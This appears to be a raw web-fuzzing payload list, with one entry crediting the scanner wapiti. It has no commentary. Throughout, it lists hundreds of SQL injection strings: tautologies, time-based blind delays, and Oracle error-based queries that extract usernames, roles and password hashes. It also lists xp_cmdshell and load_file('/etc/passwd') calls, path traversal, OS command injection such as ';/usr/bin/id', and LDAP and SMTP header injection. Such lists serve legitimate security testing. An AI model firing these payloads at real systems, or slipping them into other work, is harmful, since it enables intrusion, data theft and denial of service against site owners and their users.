1' or '1'='1
\n/usr/bin/id;
x' AND userid IS NULL; --
..\..\..\..\..\..\..\..\..\..\boot.ini
bfilename
')) and 0=benchmark(3000000,MD5(1))%20%23
%21
uname -n -s
(sqlvuln)
' or 1=1--
'))))) waitfor delay '0:0:20' --
' union select 1,load_file('/etc/passwd'),1,1,1;
or a=a
' (select top 1
" or ''qwer''=''qwer''--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
' or 1=1--
select
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' or 1 --'
' or 4479=4479--
' or ''qwer''=''qwer''--
" or 'W'='W' --
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
')))) waitfor delay '0:0:20' --
or 4479=4479 or ""=
))) and 0=benchmark(3000000,MD5(1))%20/*
',NULL)%20waifor%20delay%20'0:0:20'%20/*
") and 0=benchmark(3000000,MD5(1))%20--
' or '1'='1'--
or%201=1 --
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
+|+dir+c:%2f+|
'/**/or/**/''qwer''/**/=/**/''qwer''
select
' or user like '%
")))) waitfor delay '0:0:20' --
;|/usr/bin/id|
'))))) waitfor delay '0:0:20' /*
or 0=0 #
sleep(__TIME__)#
' or 1=1 or ''='
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
select user from sysibm.sysdummy1;
%27%20or%201=1
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' union+select+banner,null,null,null,null+from+v$version√ø
a);id|
hi') or ('a'='a
$;/usr/bin/id
declare @q nvarchar (4000) select @q =
1)) or sleep(__TIME__)#
; ping 127.0.0.1 ;
or 4479=4479 --
);waitfor delay '0:0:__TIME__'--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
\nid;
ping -n 30
../../../../../../../../../../etc/passwd
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
select version();
")%20waitfor%20delay%20'0:0:20'%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
select current_database();
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
select versionnumber, version_timestamp from sysibm.sysversions;
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
desc
replace
%0a ping -i 30 127.0.0.1 %0a
x' AND email IS NULL; --
" and 0=benchmark(3000000,MD5(1))%20%23
tz_offset
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
..\..\..\..\..\..\..\..\..\..\etc\passwd
1'1
' or '1'='1
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|id;
like
insert
%2A%7C
@*
a)|/usr/bin/id;
exec xp
'; exec xp_regread
' or 'a'='a
1||Utl_Http.request('http://<yourservername>') from dual--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
' or uid like '%
--sp_password
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
copy myfile from '/etc/passwd';
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
PRINT @@variable
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
%0Aid
') and 0=benchmark(3000000,MD5(1))%20--
<youremail>%0aCc:<youremail>
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' or 4 > 1
hi or a=a
& id
999999) or 1=1 or (1=1
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
or
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
a'
y or 1=1 --
y ' or 2 > 1
' or '7659'='7659
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
' or '1'='1
limit
' union+select+global_name,null,null,null,null+from+global_name√ø
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
waitfor delay '0:0:20' --
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
')))) and 0=benchmark(3000000,MD5(1))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or 'W'='W' #
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
) union select * from information_schema.tables;
select current_setting('port');
y ' or 10 > 9
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'
procedure
y ' or 2 between 2 and 5
$+|+Dir+c:%255c
y' AND 1=(SELECT COUNT(*) FROM tabname); --
' UNION SELECT
%29
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
:response.write 111111
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
"))%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20/*
select name, tbname, coltype from sysibm.syscolumns;
hi' or 1=1 --
<youremail>%0aBcc:<youremail>
'/**/or/**/4479/**/=/**/4479
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
' or 1 in (select @@version)--
" or sleep(__TIME__)#
') or pg_sleep(__TIME__)--
1
insert
'; exec master..xp_cmdshell
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or 3 > 1
having
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
&
')) or 1=1 or (('1'='1
\x27UNION SELECT
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
or a = a
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
))) and 0=benchmark(3000000,MD5(1))%20%23
hi') or ('a'='a
a);/usr/bin/id
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
a);id;
hi' or 1=1 --
" or 0=0 --
")) or sleep(__TIME__)="
' or '''qwer'''='''qwer''
1||;select pg_sleep(2); °™
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
")))) and 0=benchmark(3000000,MD5(1))%20--
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
;system('id')
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
)))) waitfor delay '0:0:20' --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
%29
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
a;id;
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
select * from syscat.tabauth where grantee = current user;
9999"||(select 99999999 from pg_sleep(15))||"9999
'; exec master..xp_cmdshell
%20$(sleep%2050)
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
to_timestamp_tz
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'; exec xp_regread
999999)) or 1=1 or ((1=1
?
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
;netstat -a;
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
whoami
or 1=1--
*/*
))))))))))
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
";waitfor delay '0:0:__TIME__'--
" waitfor delay '0:0:20' /*
' or 2 between 2 and 5
'))%20waitfor%20delay%20'0:0:20'%20--
)) and 0=benchmark(3000000,MD5(1))%20/*
/
) or (a=a
') and 0=benchmark(3000000,MD5(1))%20%23
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
//
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
") and 0=benchmark(3000000,MD5(1))%20/*
1\'1
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"));waitfor delay '0:0:__TIME__'--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'; waitfor delay '0:30:0'--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
) waitfor delay '0:0:20' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
' and 0=benchmark(3000000,MD5(1))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
a|id
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
1°… OR '1'='1
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
exec xp
%2A%28%7C%28objectclass%3D%2A%29%29
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
a|/usr/bin/id
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
' or ''qwer'' in (select @@version)--
y' AND members.email IS NULL; --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
1) or sleep(__TIME__)#
' or 'W'='W' --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
*(|(objectclass=*))
1; waitfor delay '0:30:0'--
a' or 'a' = 'a
a' waitfor delay '0:0:10'--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
as
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
+|+dir+c:\+|
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
1) or benchmark(10000000,MD5(1))#
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
</foo>
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
a' or 1=1--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
%20'sleep%2050'
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
& ping -i 30 127.0.0.1 &
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
' or userid like '%
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
select system_user from sysibm.sysdummy1;
))))) waitfor delay '0:0:20' --
select session_user from sysibm.sysdummy1;
x' OR full_name LIKE '%Bob%
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
' or 1=1 or ''='
' or '1'='1
yor 'a'='a' --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
%27%20or%201=1
x' AND 1=(SELECT COUNT(*) FROM tabname); --
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
<username>'--
a' waitfor delay '0:0:10'--
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
%0Aid%0A
%27union+select+UTL_INADDR.get_host_name('INTERNALs-IP'),null,null,null,null+from+dual√ø
" or benchmark(10000000,MD5(1))#
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
or 1=1 or ""=
%20'sleep%2050'
") or sleep(__TIME__)="
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' or 4479=4479 or ''='
# from wapiti
9999"||(select 99999999 from pg_sleep(15))||"9999
'exec sp_addlogin 'name' , 'password' --
' or username is not NULL or username = '
'%20or%20''='
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
//*
char%4039%41%2b%40SELECT
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
<youremail>%0d%0aBcc:<youremail>
delete
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
')))) and 0=benchmark(3000000,MD5(1))%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or ''qwer'' --'
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
')%20or%20('x'='x
||/usr/bin/id|
SELECT schemaname FROM syscat.schemata;
|/bin/ls -al
or 1=1 or ""=
" or isNULL(1/0) /*
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
' or 119 > 30000001
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
")))) waitfor delay '0:0:20' /*
a;/usr/bin/id;
"))) and 0=benchmark(3000000,MD5(1))%20%23
'sqlattempt1
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
")) or benchmark(10000000,MD5(1))#
))) waitfor delay '0:0:20' /*
*|
" waitfor delay '0:0:20' --
')%20waitfor%20delay%20'0:0:20'%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
%2A%28%7C%28mail%3D%2A%29%29
PRINT
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
t'exec master..xp_cmdshell 'nslookup www.google.com'--
select * from syscat.dbauth where grantee = current user;
a;id|
1;SELECT%20*
update
') or sleep(__TIME__)='
,NULL)%20waitfor%20delay%20'0:0:20'%20--
or ''qwer''=''qwer''
waitfor delay '0:0:20' /*
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
a)|/usr/bin/id
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' or 'something' = 'some'+'thing'
1 and user_name() = 'dbo'
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
a;id
`id`
& id
)) waitfor delay '0:0:20' /*
||6
x' AND members.email IS NULL; --
or a = a
select * from master..sysserverse
; or '4479'='4479'
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
or ''qwer''=''qwer'' or ""=
or%201=1 --
' or ''qwer''=''qwer'' /*
' or 0=0 --
' and 0=benchmark(3000000,MD5(1))%20/*
' or 5 > 6
select current_setting('log_statement');
asc
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
1 uni/**/on select all from where
| ping -n 30 127.0.0.1 |
y ' or 119 > 30000001
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
" or 4479=4479 --
' or a=a--
0 or 1=1
") or pg_sleep(__TIME__)--
1 or sleep(__TIME__)#
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"a"" or 1=1--"
yor 3=3 --
select current_user;
select current_setting('virtual_host');
x' or 1=1 or 'x'='y
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
) and 0=benchmark(3000000,MD5(1))%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
truncate
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
(select 99999999 from pg_sleep(15)) as test
order by
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
')) or benchmark(10000000,MD5(1))#
'1'OR'1°…
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
') waitfor delay '0:0:20' /*
,@variable
' union all select @@version--
<>"'%;)(&+
)))))) waitfor delay '0:0:20' --
|
%0A/usr/bin/id
y ' or 2 between 1 and 5
x' AND 1=(SELECT COUNT(*) FROM tabname); --
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
or 4479=4479 #
%0a+dir+c:%2f
%7C
<youremail>%0d%0aCc:<youremail>
||+dir|c:\
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
1 waitfor delay '0:0:10'--
select current_setting('log_connections');
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' or 1=1--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' or 0=0 --
" and 0=benchmark(3000000,MD5(1))%20/*
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
; or '1'='1'
admin' or '
'%20or%20'x'='x
select session_user;
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
\x27UNION SELECT
' or 2 > 1
select current_setting('port');
\n/usr/bin/id\n
1 or pg_sleep(__TIME__)--
delete
")))))) waitfor delay '0:0:20' --
y ' or 3=3 --
$%26%26dir+c:%2f
2+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
xyz'  OR 1%253D1+--
<>"'%;)(&+
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
or 0=0 --
')))) waitfor delay '0:0:20' /*
%0a+dir+c:%255c
|nid\n
)%20waitfor%20delay%20'0:0:20'%20--
or%201=1
y ' or 4 > 7
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
*(|(mail=*))
')))))) waitfor delay '0:0:20' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
' or 4479 --'
anything' OR 'x'='x
;id;
!
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
ls -la /tmp
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
' or ''qwer''/*
))) and 0=benchmark(3000000,MD5(1))%20--
'))%20waitfor%20delay%20'0:0:20'%20/*